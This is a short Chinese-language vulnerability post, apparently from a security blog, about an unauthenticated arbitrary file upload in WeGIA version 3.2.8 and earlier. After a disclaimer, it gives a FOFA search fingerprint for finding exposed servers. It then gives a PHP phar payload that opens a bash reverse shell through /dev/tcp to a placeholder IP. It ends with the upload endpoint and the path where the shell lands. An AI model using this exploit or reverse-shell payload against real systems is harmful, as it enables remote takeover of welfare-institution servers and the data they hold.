免责声明
本文章仅做网络安全技术研究使用!严禁用于非法犯罪行为,请严格遵守国家法律法规;请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者无关。使用本文所提供的信息或工具即视为同意本免责声明,并承诺遵守相关法律法规和道德规范。
问题描述
WeGIA是一个福利机构管理器,并且具有一下几种功能,并且在3.2.8及之前版本都存在前台任意文件上传,且都可进行直接上传Phar等文件执行任意命令,反弹Shell等操作。
fofa
"./assets/vendor/select2/select2.js"
poc
phar内容
<?php
$ip = 'IP';
$port = 4444;
system("/bin/bash -c 'bash -i >& /dev/tcp/$ip/$port 0>&1'");
?>
将phar文件上传
/WeGIA/html/socio/sistema/controller/controla_xlsx.php上传后,文件在 /WeGIA/html/socio/sistema/tabelas/shell.phar
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
